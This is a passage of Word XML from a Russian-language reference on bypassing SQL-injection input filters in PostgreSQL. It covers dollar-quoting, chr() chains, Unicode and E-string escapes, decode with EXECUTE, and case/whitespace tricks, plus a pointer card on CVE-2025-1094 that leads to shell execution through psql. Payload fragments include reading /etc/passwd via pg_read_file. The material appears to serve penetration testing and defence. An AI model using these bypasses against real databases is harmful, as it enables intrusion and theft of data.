        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: libpq — PQescapeLiteral / PQescapeIdentifier / PQescapeString / PQescapeStringConn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — затронутые функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59667289" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: psql — Meta-Commands (`\!`, `\copy`)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — фундамент chain через psql.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A44E755" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>•   Остальные источники (Rapid7 disclosure, SecureLayer7 разбор) — в 4.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506B817E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4753A1E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В категории 3.9 разобраны семь приёмов обхода input-фильтров — WAF, самописных sanitizer-ов и blacklist-функций в коде. Принципиально: 3.9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не побеждает параметризацию</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — payload идёт в значение параметра как литерал. 3.9 побеждает только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>текстовую фильтрацию</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload-а перед попаданием в SQL-builder. Если параметризация в коде есть и работает (см. 2.1 и 3.5), любая 3.9-кодировка просто становится литералом, не интерпретируется как SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7700AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Категория делится на два класса приёмов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66619395" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Лексические обходки (3.9.1–3.9.5)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — переписывают payload в семантически эквивалентную форму с другим синтаксисом, чтобы regex-фильтр не нашёл сигнатуру.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4867B7E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Структурные обходки (3.9.6)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакуют форму разделителей и регистра ключевых слов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E064380" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.7 — особый случай:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> баг в самом libpq-санитайзере (CVE-2025-1094), который превращает «защищённый» payload в SQL injection при невалидном UTF-8. Это указатель на 4.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61585CA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Per-подраздел</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E6E2F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.1 Dollar-quoting `$$...$$` и `$tag$...$tag$`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернатива одиночной кавычке для литералов. Обходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>apostrophe-escape sanitizer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>replace("'", "''")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>count-based WAF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (нечётное число </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Двойное применение: Payload A — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$/etc/passwd$$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как путь в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; Payload B — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $$ BEGIN ... END $$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как обход extended-protocol stacking ограничения. R5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559CBF1E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.2 `chr(N)||chr(N)||...`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — собирает строку из ASCII-кодов. Обходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>keyword-blacklist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на имена функций/каталогов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Payload A — chr-литерал для значения; Payload B — chr-цепочка через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в DO-блоке для имени функции. Главный недостаток — длинно, легко детектируется по статистике </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(\d+)||</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795CC8FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.3 Unicode-escape `U&amp;'\0070\0067...'` и `U&amp;"identifier"`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — лексический префикс, без function call. Обходит фильтр «слишком много </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">» и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>function_call_regex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Бонусы: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UESCAPE '!'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для обхода фильтра на backslash; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>U&amp;"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для имён таблиц/колонок на лексическом уровне. R-источники: SQL:2003 §5.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7797DC70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.4 E-strings `E'\xNN'` и `E'\NNN'`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — hex/octal-byte literals. Близок к 3.9.3, но компактнее (2 hex-цифры на байт против 4 в Unicode-escape). Уникальная возможность — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E'\x00'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для NUL-byte (обход C-string sanitizer-ов, которые обрываются на NUL). Octal-форма ортогональна hex — фильтр на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не покрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\NNN</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F0B3FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.5 `convert_from(decode('...', 'hex'|'base64'), 'UTF8')`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — самая компактная форма для длинных строк. Один literal (hex/base64) на всю строку, без побайтовых escape. Hex заметнее в логах, base64 «безобиднее» (часто скипается ручным разбором). Payload C — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>decode + EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для имени функции/каталога в DO-блоке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0835E221" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.6 Регистр keywords + whitespace tricks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакует разделитель токенов и регистр. Четыре payload-карточки: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как whitespace, tab/CR через URL-encode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%09</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%0D</w:t>
      </w:r>
      <w:r>
        <w:t>, case-mixing для case-sensitive blacklist, альтернативные тавтологии (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR NULL IS NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR 2&lt;3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Важный анти-паттерн PG: Unicode-whitespace (NBSP, U+2003) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает — PG-лексер ловит только 5 ASCII whitespace-байт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1630D113" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.7 CVE-2025-1094 (R6)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — pointer-карточка. Bug в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQescapeLiteral</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Identifier</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringConn</w:t>
      </w:r>
      <w:r>
        <w:t>: невалидный UTF-8 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\xC0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) проскакивает escape, ломает закрывающую </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, payload идёт в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняет shell. Уязвимы только chain через psql (BeyondTrust PRA/RS, backup-обёртки), не </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Django/SQLAlchemy/asyncpg. Patch: до 17.3, 16.7, 15.11, 14.16, 13.19 (13 февраля 2025). Полный разбор — в 4.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D18B82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Сравнение приёмов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2011"/>
        <w:gridCol w:w="2123"/>
        <w:gridCol w:w="3209"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="3B05CF2A"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6E1F09D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Приём</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4D89093" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Класс фильтра, который обходит</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32F3390" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Длина запис `'pg_authid'`</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4DA0531" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Главное ограничение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="10E74A1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E95818" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.9.1 dollar-quote</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E588C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>apostrophe-escape, count-based WAF</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BC2D81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>минимум (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>$$pg_authid$$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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2A7C16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>не помогает против keyword-blacklist</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="67D10840"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12E03A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3.9.2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>chr()</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30D28F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>keyword-blacklist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0A8858" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>~85 байт</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1D9459" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>function call, ловится статистикой `chr(\d+)\</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="60B53408"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366B12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3.9.3 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>U&amp;'...'</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B679FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>keyword + function-call sanitizer</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2C0B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>49</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5721B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">требует </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>standard_conforming_strings=on</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (дефолт PG 9.1+)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="64DA2F0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9A0CD8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3.9.4 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>E'\xNN'</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EB9091" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>+ NUL-byte для C-string sanitizer</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5B2D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>40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7AA35D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>E-prefix может быть в blacklist отдельно</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="7CE97EF3"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4A1BE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3.9.5 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
